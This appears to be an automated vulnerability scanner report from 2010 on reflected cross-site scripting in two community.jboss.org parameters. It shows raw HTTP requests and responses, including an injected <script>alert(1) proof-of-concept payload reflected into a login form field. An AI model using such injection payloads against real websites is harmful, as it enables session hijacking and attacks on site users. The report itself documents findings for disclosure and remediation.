1. Cross-site scripting (reflected)
1.1. http://community.jboss.org/view-people-tagcloud.jspa [queryEncoded parameter]
1.2. https://community.jboss.org/login.jspa [emailAddress parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://community.jboss |
Path: | /view-people-tagcloud |
GET /view-people-tagcloud Accept: */* Accept-Language: en-us Referer: http://community.jboss x-j-token: no-user x-requested-with: XMLHttpRequest Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: community.jboss.org Proxy-Connection: Keep-Alive Cookie: JSESSIONID=E76140915 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:34:21 GMT Server: Apache-Coyote/1.1 X-JAL: 6 Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: User-Agent X-JSL: D=7877 t=1289831661232556 Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0 Connection: close Content-Length: 18802 <!-- BEGIN result tag cloud --> <label>By Tags:</label> <div id="jive-tags-popularlist <!-- BEGIN popular tags list --> <div id="jive-populartags"> <ul class="jive-tagcloud-lis ...[SNIP]... 6dHJ1ZSwicmV1IjpmYWx <!-- tag cloud calculation completed --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://community.jboss |
Path: | /login.jspa |
GET /login.jspa?emailAddress Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: https://community.jboss Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: community.jboss.org Connection: Keep-Alive Cache-Control: no-cache Cookie: JSESSIONID=E76140915 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 15:15:30 GMT Server: Apache-Coyote/1.1 X-JAL: 11 Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: User-Agent X-JSL: D=22090 t=1289834130536927 Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0 Connection: close Content-Length: 46183 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <input type="text" name="emailAddress" id="emailAddress" value="rtfm@fastdial.net52342"><script>alert(1)< ...[SNIP]... |